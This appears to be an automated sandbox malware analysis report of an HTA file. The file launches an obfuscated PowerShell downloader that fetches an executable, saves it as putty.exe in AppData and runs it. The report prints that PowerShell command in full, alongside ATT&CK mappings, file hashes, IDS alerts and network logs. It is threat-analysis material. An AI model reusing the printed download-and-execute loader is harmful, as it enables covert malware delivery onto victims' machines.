Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738AE94B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF738AE94B8
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe"
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738A739C0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorDacl,GetLastError,LocalFree,LocalFree,3_2_00007FF738A739C0
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738A73BE0 AllocateAndInitializeSid,AllocateAndInitializeSid,GetLastError,GetLastError,GetLastError,3_2_00007FF738A73BE0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: RegisterClipboardFormatA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoInitializeEx,MessageBoxA,MonitorFromWindow,GetMonitorInfoA,GetDesktopWindow,GetClientRect,CreateWindowExW,GetLastError,MonitorFromWindow,MonitorFromWindow,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,SetWindowLongPtrA,GetWindowRect,GetWindowRect,GetClientRect,GetWindowRect,MonitorFromWindow,GetMonitorInfoA,GetDesktopWindow,GetClientRect,SetWindowPos,CreateBitmap,CreateCaret,SetScrollInfo,GetDoubleClickTime,GetSystemMenu,CreatePopupMenu,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,CreateMenu,DeleteMenu,DeleteMenu,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,GetKeyboardLayout,GetLocaleInfoA,ShowWindow,SetForegroundWindow,GetForegroundWindow,UpdateWindow,PeekMessageW,IsWindow,DispatchMessageW,IsDialogMessageA,PeekMessageA,GetForegroundWindow,MsgWaitForMultipleObjects,DispatchMessageW,PeekMessageW,IsWindow,IsDialogMessageA,3_2_00007FF738A352A7
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: GetLocaleInfoA,DefWindowProcW,3_2_00007FF738A31947
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: GetLocaleInfoW,3_2_00007FF738B00CD8
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00007FF738B08044
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: EnumSystemLocalesW,3_2_00007FF738B08344
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: EnumSystemLocalesW,3_2_00007FF738B08660
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: EnumSystemLocalesW,3_2_00007FF738B0180C
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00007FF738B088E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738AD9D00 CreateNamedPipeA,CreateEventA,GetLastError,3_2_00007FF738AD9D00
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738AE99A8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00007FF738AE99A8
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738AA7F30 GetProcAddress,GetUserNameA,GetUserNameA,3_2_00007FF738AA7F30
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738B157C4 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,3_2_00007FF738B157C4
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738A73F30 GetVersionExA,GetProcAddress,3_2_00007FF738A73F30
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738A6BC40 socket,SetHandleInformation,setsockopt,getaddrinfo,htons,inet_addr,htonl,htonl,htons,bind,listen,closesocket,WSAGetLastError,closesocket,closesocket,WSAGetLastError,3_2_00007FF738A6BC40
Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 3_2_00007FF738A6B6D0 closesocket,socket,SetHandleInformation,setsockopt,setsockopt,setsockopt,htonl,htons,bind,WSAGetLastError,WSAGetLastError,htons,htonl,htons,connect,WSAGetLastError,3_2_00007FF738A6B6D0
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
11
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Command and Scripting Interpreter
Boot or Logon Initialization Scripts12
Process Injection
2
Obfuscated Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol1
Email Collection
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell
Logon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin Shares11
Input Capture
2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Masquerading
NTDS24
System Information Discovery
Distributed Component Object Model3
Clipboard Data
3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
Virtualization/Sandbox Evasion
LSA Secrets11
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
Process Injection
Cached Domain Credentials1
Process Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync21
Virtualization/Sandbox Evasion
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem11
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Source | Detection | Scanner
qwertyuiopasdfghjklzxcvbnm.hta | 12% | Virustotal
qwertyuiopasdfghjklzxcvbnm.hta | 3% | ReversingLabs

Source | Detection | Scanner
C:\Users\user\AppData\Roaming\putty.exe | 3% | ReversingLabs
C:\Users\user\AppData\Roaming\putty.exe | 6% | Virustotal

No Antivirus matches

Name | IP | Active | Malicious | Antivirus Detection | Reputation
the.earth.li | 93.93.131.124 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://the.earth.li/~sgtatham/putty/0.82/w64/putty.exe | false | | high
https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe | false | | high
        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1707635780.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://sectigo.com/CPS0powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drfalse
            high
            http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drfalse
              high
              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drfalse
                high
                http://ocsp.sectigo.com0powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drfalse
                  high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1707635780.0000000004FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1707635780.0000000004FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.microsoft.copowershell.exe, 00000001.00000002.1715064854.00000000079F5000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Licensepowershell.exe, 00000001.00000002.1707635780.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Iconpowershell.exe, 00000001.00000002.1707635780.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drfalse
                              high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.dr | false | high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.dr | false | high
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.1707635780.0000000004FD8000.00000004.00000800.00020000.00000000.sdmp | false | high
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0 | powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.dr | false | high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.dr | false | high
https://www.chiark.greenend.org.uk/~sgtatham/putty/ | powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, putty.exe, putty.exe, 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp, putty.exe, 00000003.00000000.1705777780.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp, putty.exe.1.dr | false | high
https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.1707635780.0000000004E81000.00000004.00000800.00020000.00000000.sdmp | false | high
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z | powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.dr | false | high
https://contoso.com/ | powershell.exe, 00000001.00000002.1707635780.0000000005EEC000.00000004.00000800.00020000.00000000.sdmp | false | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1707635780.0000000005EEC000.00000004.00000800.00020000.00000000.sdmp | false | high
https://the.earth.li | powershell.exe, 00000001.00000002.1707635780.0000000004FD8000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1707635780.0000000004E81000.00000004.00000800.00020000.00000000.sdmp | false | high
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0# | powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.dr | false | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
93.93.131.124 | the.earth.li | United Kingdom | | 44684 | MYTHICMythicBeastsLtdGB | false
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1583693
                                                        Start date and time:2025-01-03 12:17:04 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 5m 7s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:8
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:qwertyuiopasdfghjklzxcvbnm.hta
                                                        Detection:MAL
                                                        Classification:mal68.evad.winHTA@6/4@1/1
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:
                                                        • Successful, ratio: 96%
                                                        • Number of executed functions: 53
                                                        • Number of non-executed functions: 184
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .hta
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded IPs from analysis (whitelisted): 20.12.23.50, 4.245.163.56, 13.107.246.45
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target powershell.exe, PID 7496 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:17:54 | API Interceptor | 37x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
93.93.131.124 | a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta | malicious | Unknown | the.earth.li/~sgtatham/putty/0.63/x86/putty.exe
93.93.131.124 | doc.doc | malicious | Unknown | the.earth.li/~sgtatham/putty/latest/w64/putty.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
the.earth.li | file.exe | malicious | Unknown | 93.93.131.124
the.earth.li | setup.exe | malicious | Amadey | 93.93.131.124
the.earth.li | Wzphku.exe | malicious | Unknown | 93.93.131.124
the.earth.li | Wzphku.exe | malicious | Unknown | 93.93.131.124
the.earth.li | epah.hta | malicious | Unknown | 93.93.131.124
the.earth.li | a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta | malicious | Unknown | 93.93.131.124
the.earth.li | client_1.hta | malicious | Unknown | 93.93.131.124
the.earth.li | client_3.vbs | malicious | Unknown | 93.93.131.124
the.earth.li | Informazion.vbs | malicious | Unknown | 93.93.131.124
the.earth.li | 827837hj.xls | malicious | Unknown | 93.93.131.124
Match | Associated Sample Name / URL | Detection | Threat Name | Context
MYTHICMythicBeastsLtdGB | file.exe | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | setup.exe | malicious | Amadey | 93.93.131.124
MYTHICMythicBeastsLtdGB | Wzphku.exe | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | Wzphku.exe | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | epah.hta | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | client_1.hta | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | client_3.vbs | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | Informazion.vbs | malicious | Unknown | 93.93.131.124
MYTHICMythicBeastsLtdGB | 827837hj.xls | malicious | Unknown | 93.93.131.124
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | W2k2NLSvja.exe | malicious | Snake Keylogger, VIP Keylogger | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | FACT0987789000900.exe | malicious | Snake Keylogger, VIP Keylogger | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | 2Mi3lKoJfj.exe | malicious | Quasar | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | RFQ-12202431_ACD_Group.pif.exe | malicious | Unknown | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | RFQ-12202431_ACD_Group.pif.exe | malicious | Unknown | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | ogVinh0jhq.exe | malicious | DCRat | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | Sylacauga AL License.msg | malicious | Unknown | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtml | malicious | HTMLPhisher | 93.93.131.124
3b5074b1b5d032e5620f69f9f700ff0e | image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 93.93.131.124
                                                        No context
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1300
                                                        Entropy (8bit):5.395716438237918
                                                        Encrypted:false
                                                        SSDEEP:24:3tWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NK3R8QHr8H+:9WSU4xymI4RfoUeW+mZ9tK8NWR8QHJ
                                                        MD5:9EF8B2003378669DE703CF175FCC98D4
                                                        SHA1:6B3E8BCFE2F4CBE1B9135CE804229E7166011FA6
                                                        SHA-256:D9CF0B9A98A1405927013F7728729B018F9745D977CB1D49D14344D7DEFA06D6
                                                        SHA-512:665C75149C733BC149FC651A3120DFD91431D23318C95342127AEC129B65564E48EC0F718990C1F5F345CA7C51A0CD58D53C51DBB1FA49CCB0193207447A3EC9
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1683560
                                                        Entropy (8bit):6.926735820248318
                                                        Encrypted:false
                                                        SSDEEP:49152:rKha/+cyVQ15lPzJkSnQOYnwOiYlBA7KVO3QTmdQQ:rPJNoBUKkemdJ
                                                        MD5:765BDC0F8BC0D77F7414E7A36AE45FD9
                                                        SHA1:C303968D61BFEB154A110549217D40BBDAA7439C
                                                        SHA-256:AA8F8A3E268493157E62D93AB9CAFB94573606FE43A80E63E3E4F2E5C9B22A5B
                                                        SHA-512:5BB1267C5F4B7DC67D7DA75AF08CE616D5F518EA5469443DED642C2C7410256B370D1B01C355191AE9DF8CB3E56CE31910FF153761787AAD054148B12ADD5718
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        • Antivirus: Virustotal, Detection: 6%, Browse
                                                        Reputation:low
                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Dg.........."......p..........D..........@..........................................`..................................................X..................To...J..hf......0!.......................... D..(...P...@...........hd...............................text....n.......p.................. ..`.rdata...7.......8...t..............@..@.data....A..........................@....pdata..To.......p..................@..@.00cfg..8............,..............@..@.gxfg....*.......,..................@..@.tls.................Z..............@..._RDATA..\............\..............@..@.rsrc................^..............@..@.reloc..0!......."...(..............@..B........................................................................................................................................................................................................................
                                                        File type:HTML document, ASCII text, with very long lines (4026)
                                                        Entropy (8bit):5.696580859615345
                                                        TrID:
                                                        • Visual Basic Script (13500/0) 27.83%
                                                        • HyperText Markup Language (12001/1) 24.74%
                                                        • HyperText Markup Language (12001/1) 24.74%
                                                        • HyperText Markup Language (11001/1) 22.68%
                                                        File name:qwertyuiopasdfghjklzxcvbnm.hta
                                                        File size:18'094 bytes
                                                        MD5:3ed42aa65e65e6f7ae0dd6c83200e076
                                                        SHA1:bd6d720a134ad38173bf5eaf07f3357d2653ec0c
                                                        SHA256:c51efd8c212706aa13de88fac4d6a28e29a44efeb93d39b188d61c51ca2259d5
                                                        SHA512:df9e451722bf7b203412601da838ba1cc93c2c01512d45f21b5f38bb57e3b522ad46a5358d3f13fa5a27bf0355754c274efdc8c0c7f64711389e6522487b54f5
                                                        SSDEEP:384:HOMPE/hx20iLFVP/TLlVH2p+KP+RyK/f4tblb9VN:HOuCi0iLFVU15v
                                                        TLSH:F3820EA89C772521220A58F9C847627E1D60181E3F5C88A0377E56CE87BB8CDD2F779D
                                                        File Content Preview:<html xmlns="http://www.w3.org/1999/xhtml">.<head>.<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />.<script language="VBScript">.private const NPARA_USERNAME = "username".private const NPARA_PASSWORD = "password".private const NPARA
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-03T12:17:57.355363+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49731 | 93.93.131.124 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Jan 3, 2025 12:17:57.661349058 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.661572933 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.661638975 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.699913025 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.699989080 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.700128078 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.700185061 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.700336933 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.700392962 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.700695992 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.700752020 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.701133013 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.701189041 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.701410055 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.701467037 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.701570988 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.701632023 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.701771975 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.701831102 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:57.704780102 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:57.704839945 CET49731443192.168.2.493.93.131.124
